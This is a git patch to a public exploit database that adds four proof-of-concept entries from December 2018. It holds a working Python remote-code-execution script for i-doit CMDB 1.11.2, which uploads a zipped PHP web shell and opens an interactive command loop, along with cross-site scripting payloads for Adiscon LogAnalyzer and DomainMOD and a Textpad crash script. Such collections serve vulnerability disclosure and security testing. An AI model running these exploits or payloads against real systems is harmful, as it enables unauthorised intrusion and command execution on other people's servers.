From c49a1520f12a1a82008905b0c23e61cf0406096c Mon Sep 17 00:00:00 2001
From: Offensive Security <info@exploit-db.com>
Date: Mon, 10 Dec 2018 05:01:40 +0000
Subject: [PATCH] DB: 2018-12-10

4 changes to exploits/shellcodes

Textpad 8.1.2 - Denial Of Service (PoC)
i-doit CMDB 1.11.2 - Remote Code Execution
Adiscon LogAnalyzer 4.1.7 - Cross-Site Scripting
DomainMOD 4.11.01 - 'DisplayName' Cross-Site Scripting
---
 exploits/php/webapps/45957.py     | 105 ++++++++++++++++++++++++++++++
 exploits/php/webapps/45958.txt    |  22 +++++++
 exploits/php/webapps/45959.txt    |  16 +++++
 exploits/windows_x86/dos/45956.py |  25 +++++++
 files_exploits.csv                |   4 ++
 5 files changed, 172 insertions(+)
 create mode 100755 exploits/php/webapps/45957.py
 create mode 100644 exploits/php/webapps/45958.txt
 create mode 100644 exploits/php/webapps/45959.txt
 create mode 100755 exploits/windows_x86/dos/45956.py

diff --git a/exploits/php/webapps/45957.py b/exploits/php/webapps/45957.py
new file mode 100755
index 000000000..3e64456af
--- /dev/null
+++ b/exploits/php/webapps/45957.py
@@ -0,0 +1,105 @@
+# Exploit Title: i-doit CMDB 1.11.2 - Remote Code Execution
+# Date: 2018-12-05
+# Exploit Author: Özkan Mustafa Akkuş (AkkuS)
+# Contact: https://pentest.com.tr
+# Vendor Homepage: https://www.i-doit.org/
+# Software Link: https://www.i-doit.org/i-doit-open-1-11-2/
+# Version: v1.11.2
+# Category: Webapps
+# Tested on: XAMPP for Linux 5.6.38-0
+# Software Description : The IT-documentation solution i-doit is based on a
+# complete open
+# source configuration management and database. Using i-doit as a CMDB you
+# can manage your IT according to ITIL best practices and configurate the significant
+# components of your IT environment
+# Description : This application has an upload feature that allows an
+# authenticated user with administrator
+# roles to upload arbitrary files to the main website directory.
+# ==================================================================
+# PoC: Exploit upload the ".php" file in the ".zip" file to Remote Code Execution.
+# i-doit accepts zip files as a plugin and extract them to the main
+# directory. In order for the ".zip" file to be accepted by the application, it must
+# contain a file named "package.json
+
+#!/usr/bin/python
+
+import mechanize
+import sys
+import cookielib
+import requests
+import colorama
+from colorama import Fore
+
+print
+"\n############################################################################"
+print "# i-doit CMDB & ITSM 1.11.2 Remote Code Execution - Remote Code Execution  #"
+print "#                   Vulnerability discovered byvAkkuS                      #"
+print "#                  My Blog - https://www.pentest.com.tr					  #"
+print
+"############################################################################\n"
+if (len(sys.argv) != 2):
+    print "[*] Usage: poc.py <RHOST>"
+    exit(0)
+
+rhost = sys.argv[1]
+
+# User Information Input
+UserName = str(raw_input("User Name: "))
+Password = str(raw_input("Password: "))
+
+# Login into site
+print(Fore.BLUE + "+ [*] Loging in...")
+br = mechanize.Browser()
+br.set_handle_robots(False)
+
+# Cookie Jar
+cj = cookielib.LWPCookieJar()
+br.set_cookiejar(cj)
+
+br.open("http://"+rhost+"/admin/")
+assert br.viewing_html()
+br.select_form(nr=0)
+br.form['username'] = UserName
+br.form['password'] = Password
+br.submit()
+
+title = br.title()
+print (Fore.YELLOW + "+ [*] You're in "+title+" section of the app now")
+
+# Arbitrary ".php" File Upload Records with multipart/form-data to RCE
+rce_headers = {"Accept":
+"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8",
+"Accept-Language": "en-US,en;q=0.5", "Accept-Encoding": "gzip, deflate",
+"Content-Type": "multipart/form-data;
+boundary=---------------------------13859713751632544601258659337"}
+rce_data="-----------------------------13859713751632544601258659337\r\nContent-Disposition:
+form-data;
+name=\"action\"\r\n\r\nadd\r\n-----------------------------13859713751632544601258659337\r\nContent-Disposition:
+form-data;
+name=\"mandator\"\r\n\r\n0\r\n-----------------------------13859713751632544601258659337\r\nContent-Disposition:
+form-data; name=\"module_file\"; filename=\"test.zip\"\r\nContent-Type:
+application/zip\r\n\r\nPK\x03\x04\x14\x00\x08\x00\x08\x00\x06\x89\x85M\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x0c\x00
+\x00package.jsonUT\r\x00\x07\xcc\xdb\x07\\\xcc\xdb\x07\\\xcc\xdb\x07\\ux\x0b\x00\x01\x04\x00\x00\x00\x00\x04\x00\x00\x00\x00\x03\x00PK\x07\x08\x00\x00\x00\x00\x02\x00\x00\x00\x00\x00\x00\x00PK\x03\x04\x14\x00\x08\x00\x08\x00G\x87{M\x00\x00\x00\x00\x00\x00\x00\x00\xdc\x01\x00\x00\t\x00
+\x00shell.phpUT\r\x00\x07wM\xfd[7\x81\x07\\wM\xfd[ux\x0b\x00\x01\x04\x00\x00\x00\x00\x04\x00\x00\x00\x00\x95\x91\xcbj\xc30\x10E\xf7\xfa\x8a\xc1\x18,\xd3\xe6\x0b\xd2G6I)d\x15\xb2+e\x10\xf2\xb8\x16\xd1#x\xe4<\x08\xf9\xf7:\x8d\xe3\xb8M\xbb\xe8JH\xf7\xce\xbdg\xd0\xc3\xf3\xbaZ\x8b4V\x86\xb14\x96\xe0\x11\x10g\xaf\xf3)\xe2XLx\xcf\x91\x9cLt\xe5B\x01\xcdG\x18m\xe1\xeaM\xf2o\x16\x15c\rw\xe6\x87!\xd5\xc19\xe5\x8b68\xc5\x97\xe9\xf2-\xd1\xaeH\xde\xc7B\x98\x12\xa4\xb6\x8a\x19ig8\xb2\xcc\x16TZ\xd2\xd1\x04?k\xfc\xd7\x99\xe59\x1c\x84\x00\x80\xb4\xec\x9e\xda
+O[\xb8\xf5\xca\xec\xcc\x92\xb5\xad\xc3\x81\xd1\x93\xf1\x9b\xb0\"yAiuq\x04\xb2L'\x84\x8b\xad\xa7\xd0\xcaZl\x98j<I\xa8\xeaZ\xed\xaf\x1c\xbf\xa9}\xf3=\x9c\xef}\xd3\xbf\xaa\xfe*\x19\xc4\xdf\xae\xd0Mt\xdf0\xd0\x8f\xe2\x13PK\x07\x08\xc6=\x06k\xde\x00\x00\x00\xdc\x01\x00\x00PK\x01\x02\x14\x03\x14\x00\x08\x00\x08\x00\x06\x89\x85M\x00\x00\x00\x00\x02\x00\x00\x00\x00\x00\x00\x00\x0c\x00
+\x00\x00\x00\x00\x00\x00\x00\x00\x00\xa4\x81\x00\x00\x00\x00package.jsonUT\r\x00\x07\xcc\xdb\x07\\\xcc\xdb\x07\\\xcc\xdb\x07\\ux\x0b\x00\x01\x04\x00\x00\x00\x00\x04\x00\x00\x00\x00PK\x01\x02\x14\x03\x14\x00\x08\x00\x08\x00G\x87{M\xc6=\x06k\xde\x00\x00\x00\xdc\x01\x00\x00\t\x00
+\x00\x00\x00\x00\x00\x00\x00\x00\x00\xa4\x81\\\x00\x00\x00shell.phpUT\r\x00\x07wM\xfd[7\x81\x07\\wM\xfd[ux\x0b\x00\x01\x04\x00\x00\x00\x00\x04\x00\x00\x00\x00PK\x05\x06\x00\x00\x00\x00\x02\x00\x02\x00\xb1\x00\x00\x00\x91\x01\x00\x00\x00\x00\r\n-----------------------------13859713751632544601258659337--\r\n"
+
+upload = requests.post("http://"+rhost+"/admin/?req=modules&action=add",
+headers=rce_headers, cookies=cj, data=rce_data)
+# Upload Control
+if upload.status_code == 200:
+   print (Fore.GREEN + "+ [*] Shell successfully uploaded!")
+
+# Command Execute
+while True:
+      shellctrl = requests.get("http://"+rhost+"/shell.php")
+      if shellctrl.status_code == 200:
+         Command = str(raw_input(Fore.WHITE + "shell> "))
+     URL = requests.get("http://"+rhost+"/shell.php?cmd="+Command+"")
+            print URL.text
+      else:
+         print (Fore.RED + "+ [X] Unable to upload or access the shell")
+         sys.exit()
+
+# end
\ No newline at end of file
diff --git a/exploits/php/webapps/45958.txt b/exploits/php/webapps/45958.txt
new file mode 100644
index 000000000..4f338a81e
--- /dev/null
+++ b/exploits/php/webapps/45958.txt
@@ -0,0 +1,22 @@
+# Exploit Title: Adiscon LogAnalyzer 4.1.7 - Cross-Site Scripting
+# Date: 2018-12-05
+# Software Link: *httpås://loganalyzer.adiscon.com/
+# <https://loganalyzer.adiscon.com/> https://github.com/rsyslog/loganalyzer
+# <https://github.com/rsyslog/loganalyzer>*
+# Exploit Author: Gustavo Sorondo
+# Contact: http://twitter.com/iampuky
+# Website: http://cintainfinita.com/
+# CVE: CVE-2018-19877
+# Category: webapps
+
+# 1. Description
+# Adiscon LogAnalyzer  before 4.1.7 is affected by Cross-Site Scripting (XSS)
+# in the 'referer' parameter of the login.php file.
+
+# 2. Proof of Concept
+
+http://my.loganalyzer.instance/login.php?referer=%22%3E%3Cscript%3Ealert('Cinta%20Infinita')%3C/script%3E
+
+# 3. Solution:
+# Update to version 4.1.7.
+# https://loganalyzer.adiscon.com/news/loganalyzer-v4-1-7-v4-stable-released/
\ No newline at end of file
diff --git a/exploits/php/webapps/45959.txt b/exploits/php/webapps/45959.txt
new file mode 100644
index 000000000..7eef35308
--- /dev/null
+++ b/exploits/php/webapps/45959.txt
@@ -0,0 +1,16 @@
+# Exploit Title: DomainMOD 4.11.01 - Cross-Site Scripting
+# Date: 2018-11-22
+# Exploit Author: Mohammed Abdul Raheem
+# Vendor Homepage: domainmod (https://domainmod.org/)
+# Software Link: domainmod (https://github.com/domainmod/domainmod)
+# Version: v4.09.03 to v4.11.01
+# CVE : CVE-2018-19892
+
+# A Stored Cross-site scripting (XSS) was discovered in DomainMod application
+# versions from v4.09.03 to v4.11.01
+# (https://github.com/domainmod/domainmod/issues/85)
+# After logging into the Domainmod application panel, browse to the
+# /admin/dw/add-server.php page and inject a javascript XSS payload in
+# DisplayName, Username & host name fields 
+
+"><img src=x onerror=alert("Xss-By-Abdul-Raheem")>
\ No newline at end of file
diff --git a/exploits/windows_x86/dos/45956.py b/exploits/windows_x86/dos/45956.py
new file mode 100755
index 000000000..c37c58b6b
--- /dev/null
+++ b/exploits/windows_x86/dos/45956.py
@@ -0,0 +1,25 @@
+# Exploit Title: Textpad 8.1.2 - Denial Of Service (PoC)
+# Author: Gionathan "John" Reale
+# Discovey Date: 2018-12-06
+# Homepage: https://textpad.com
+# Software Link: https://www.textpad.com/download/v81/win32/txpeng812-32.zip
+# Tested Version: 8.1.2
+# Tested on OS: Windows 7 32-bit
+# Steps to Reproduce: Run the python exploit script, it will create a new 
+# file with the name "exploit.txt" just copy the text inside "exploit.txt"
+# and start the program. In the new window click "Tools" > "Run...". Now paste the content of 
+# "exploit.txt" into the fields:"Command". Click "OK" and you will see a crash.
+
+#!/usr/bin/python
+   
+buffer = "A" * 5000
+
+payload = buffer
+try:
+    f=open("exploit.txt","w")
+    print "[+] Creating %s bytes evil payload.." %len(payload)
+    f.write(payload)
+    f.close()
+    print "[+] File created!"
+except:
+    print "File cannot be created"
\ No newline at end of file
diff --git a/files_exploits.csv b/files_exploits.csv
index 015cb11be..163a32885 100644
--- a/files_exploits.csv
+++ b/files_exploits.csv
@@ -6207,6 +6207,7 @@ id,file,description,date,author,type,platform,port
 45936,exploits/windows/dos/45936.ps1,"Microsoft Lync for Mac 2011 - Injection Forced Browsing/Download",2018-12-04,nyxgeek,dos,windows,
 45950,exploits/multiple/dos/45950.txt,"Wireshark - 'cdma2k_message_ACTIVE_SET_RECORD_FIELDS' Stack Corruption",2018-12-04,"Google Security Research",dos,multiple,
 45951,exploits/multiple/dos/45951.txt,"Wireshark - 'find_signature' Heap Out-of-Bounds Read",2018-12-04,"Google Security Research",dos,multiple,
+45956,exploits/windows_x86/dos/45956.py,"Textpad 8.1.2 - Denial Of Service (PoC)",2018-12-09,"Gionathan Reale",dos,windows_x86,
 3,exploits/linux/local/3.c,"Linux Kernel 2.2.x/2.4.x (RedHat) - 'ptrace/kmod' Local Privilege Escalation",2003-03-30,"Wojciech Purczynski",local,linux,
 4,exploits/solaris/local/4.c,"Sun SUNWlldap Library Hostname - Local Buffer Overflow",2003-04-01,Andi,local,solaris,
 12,exploits/linux/local/12.c,"Linux Kernel < 2.4.20 - Module Loader Privilege Escalation",2003-04-14,KuRaK,local,linux,
@@ -40454,3 +40455,6 @@ id,file,description,date,author,type,platform,port
 45949,exploits/php/webapps/45949.txt,"DomainMOD 4.11.01 - Registrar Cross-Site Scripting",2018-12-04,"Mohammed Abdul Raheem",webapps,php,80
 45954,exploits/php/webapps/45954.txt,"FreshRSS 1.11.1 - Cross-Site Scripting",2018-12-04,Netsparker,webapps,php,80
 45955,exploits/php/webapps/45955.txt,"HasanMWB 1.0 - SQL Injection",2018-12-05,"Ihsan Sencan",webapps,php,80
+45957,exploits/php/webapps/45957.py,"i-doit CMDB 1.11.2 - Remote Code Execution",2018-12-09,AkkuS,webapps,php,
+45958,exploits/php/webapps/45958.txt,"Adiscon LogAnalyzer 4.1.7 - Cross-Site Scripting",2018-12-09,"Gustavo Sorondo",webapps,php,
+45959,exploits/php/webapps/45959.txt,"DomainMOD 4.11.01 - 'DisplayName' Cross-Site Scripting",2018-12-09,"Mohammed Abdul Raheem",webapps,php,